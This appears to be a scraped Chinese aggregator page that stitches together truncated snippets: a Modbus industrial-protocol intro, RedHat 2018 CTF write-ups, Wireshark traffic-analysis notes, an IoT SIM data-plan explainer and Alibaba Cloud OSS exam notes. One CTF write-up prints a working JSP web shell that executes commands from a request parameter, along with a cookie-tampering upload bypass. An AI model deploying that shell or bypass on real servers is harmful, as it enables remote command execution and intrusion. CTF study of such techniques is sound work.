流量包

工控安全入门(一)—— Modbus协议

岁酱吖の 提交于 2019-12-06 10:06:39
modbus基础知识 modbus协议最初是由Modicon公司在1971年推出的全球第一款真正意义上用于工业现场的总线协议,最初是为了实现串行通信,运用在串口(如RS232、RS485等)传输上的,分为ModbusRTU、Modbus ASCII两种,后来施耐德电气将该公司收购,并在1997年推出了基于TCP/IP的Modbus TCP。现在使用最多的就是Modbus TCP了,我们今天的主角也是它。 Modbus作为一种通信协议,它和我们之前介绍的Zigbee有很大不同,Zigbee有自己完整的协议栈,而Modbus是一种应用层的报文传输协议,它既可以在物理层面上选择串口进行简单的串行通信,也可以使用TCP的方式进行传输。 上图可以看到Modbus的协议栈仅仅是在传统ISO/OSI模型的基础上对数据链路层和应用层做了定义。也正是因为modbus是应用层的协议,所以它的安全漏洞并不只是它本身,TCP/IP的漏洞也可以利用在modbus上,最典型的就是18年工控比赛的题目,中间人。 modbus是一种主从协议,主设备的一方向从设备的一方下达指令,从设备的一方根据指令做出反应并回复主设备,主设备可以有多个从设备。具体来说,工作人员的计算机可认为是master,而PLC之类的具体设备就是slave了。每个设备有自己的“代号”,主设备通过“代号”来找到某一个对应的设备

第二届红帽杯线上初赛 RedHat 2018 WriteUp

假装没事ソ 提交于 2019-12-03 10:19:20
又是一个划水的比赛,作看高中生吊打全场orz,太强了。 WEB simple upload 进入一个登陆页面,抓包之后发现cookie有admin=0 改成1之后进入了一个上传页面,获取指纹之后,明显是Apache Tomcat,传一个一句话asp马过去试试。上传yulige.jsp.jpg <% if ( "023" .equals(request.getParameter( "pwd" ))){ java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter( "i" )).getInputStream(); int a = - 1 ; byte [] b = new byte [ 2048 ]; out.print( "<pre>" ); while ((a=in.read(b))!=- 1 ){ out.println( new String(b)); } out.print( "</pre>" ); } %> 抓包,然后把.jpg去掉,发现成功上传。 然后蚁剑连接。在根目录下拿到flag。 flag{20c9076c-b3b3-4f33-b75e-12040779ee19} shopping log 进去页面之后查看源代码,发现指向了 tmvb.com ,跳转到那个页面之后发现是域名出售

面向萌新的红帽杯2018线上赛wp

谁说胖子不能爱 提交于 2019-12-03 10:17:27
网络安全攻防大赛第二届“红帽杯”网络安全攻防大赛( 除了web3 guess id,不会做。没写。 ) misc2 Not Only Wireshark 下载流量包,wireshark打开,过滤查看http 发现name可疑,用python re全部提取出来 504B0304,zip文件头了解一下 得到2.zip,打开发现需要密码 然后在流量包中ctrl+f搜索pass、pw、word、key,发现key有东西 使用?id=1128%23解密得到flag misc3听说你们喜欢手工爆破 下载附件查看发现500个txt+1个带密码的rar,把所有txt提取出来,py查看文件内容,都是VGgzcjMgMXMgbjAgZjFhZw==,base64解密为Th3r3 1s n0 f1ag,以上两个都不是rar的密码。用py提取所有txt文件名作为字典,使用aapr跑字典爆破rar密码 解开压缩包,查看doc文档,发现仍有密码。 到52破解上下载一个aopr,跑doc密码,可打印字符从1位跑到6位,同时在想其他办法。发现aopr把密码跑出来了,5693 百度情系海边之城,得到提示为曼彻斯特编码, 转为二进制得到 \>\>\> s = ’123654AAA 67887630355 5111AAA 77611A321 ‘\>\>\> bin(int(s,16))’ 0b1001000110

CTF-流量分析笔记

限于喜欢 提交于 2019-11-30 23:25:04
---恢复内容开始--- 前言 做流量分析很长时间了但是一直没有系统的去总结过这类题目的做法和思路以及wireshark的使用方法,这次做题的时候突然发现了一个总结的特别好的博客,因此想趁机做个笔记总结一下。 参考链接:https://mp.weixin.qq.com/s?__biz=MzU1ODg3NTMyMQ==&mid=2247489263&idx=1&sn=d9060114d924266ed2bdf4311ca030dd&source=41#wechat_redirect https://jwt1399.top/2019/07/29/ctf-liu-liang-fen-xi-zong-jie/#toc-heading-4 Wireshark的使用 wireshark的基本使用方法有数据包筛选、数据包搜索、数据包还原、 数据提取四个部分。 1.数据包筛选 1.1筛选ip 源筛选ip ip.src == ip 地址 或者手动操作 点击任意一个符合筛选条件的数据包,找到IPv4下的Source字段。 右键点击Source字段,作为过滤器应用 – 选中。 目的ip筛选 ip.dst == ip地址 或者手动操作: 点击任意一个符合筛选条件的数据包,找到IPv4下的Destination字段,右键点击Destination字段,作为过滤器应用 – 选中。 1.2 mac 地址筛选:

小知识!一文搞懂物联卡流量定向与不定向的区别!

微笑、不失礼 提交于 2019-11-30 04:50:59
物联卡中心物联卡和我们平时用的SIM是一样的,只不过只有流量,没有电话和短信的功能,一般只供企业使用,用在企业设备上用来存储数据链接互联网,从达到远程控制或者监控的目的,物联卡使用物联网单独的通道进行数据传输,和手机卡的频道不同,一般手机卡11位,而物联卡一般是13位。 既然提到物联卡,那不得不说的就是物联卡的流量问题了,物联网卡分为定向流量和通用流量,一般来说定向流量的费用比较低,但定向流量的使用范围也会受到限制,而通用流量就不会出现这种问题。 定向流量又叫对口流量是指规定某些线路和某些业务可以使用,这种流量具有很强的针对性,只允许用户终端访问客户预先设置的业务平台或应用系统,不允许访问任何其他网络和服务,只要不超过所订购的定向流量包时,所使用的流量不会从套餐流量包和其他通用流量包中扣除;与之相对应的是:非定向流量。 非定向就没有限制,只要手机上网产生流量都可以使用。也就是没有任何的限制,除了定向流量以外的上网。所以非定向流量和定向流量是最大区别是在使用的业务范围。 而目前在物联网行业中同样存在定向流量和非定向流量的区别,如市面上最常见的电信流量卡,则是用的就是非定向流量,但是某些公司所销售物联网卡则是定向流量,通过电信的系统,通过vpn手段将定向流量转成非定向流量来使用,这样就可以拿着相对较低廉的价格卖着市面上相同的价格,这样一来利润也就展现出来了!

阿里云认证ACP-对象存储 OSS(17%)

半世苍凉 提交于 2019-11-28 06:03:11
对象存储 OSS考点梳理 OSS 概念及功能概述 OSS 管理功能 OSS 功能详解 OSS 安全 OSS API OSS 控制台及调用演示 使用限制 存储空间( bucket ) 同一阿里云账号在同一地域内创建的存储空间总数 不能超过 30 个 。 存储空间一旦创建成功,其 名称、所处地域、存储类型不能修改。 单个存储空间的 容量不限制。 上传/下载文件 通过 控制台 上传、简单上传、表单上传、追加上传的文件大小 不能超过 5GB ,要上传大小 超过 5GB 的文件必须使用 断点续传 方式。 断点续传方式上传的文件大小不能超过 48.8TB 。 同一账号在同一地域内上传或下载带宽缺省阈值:中国 大陆 10Gb it/s、其他 5Gb it/s。达到该阈值会收到 DownloadTrafficRateLimitExceeded 或 UploadTrafficRateLimitExceeded 错误响应。如您的业务(如大数据离线处理等)有更大的带宽需求(如 10Gbit/s~100Gbit/s),请联系 售后技术支持 。 OSS 支持上传同名文件,但会覆盖已有文件。 删除文件 文件删除后 无法恢复 。 控制台批量删除文件的上限为 1000 个,更大批量的删除必须通过 API 或 SDK 实现。 域名绑定 账号 必须 在 阿里云 官网完成 实名 认证。 中国大陆地域绑定的域名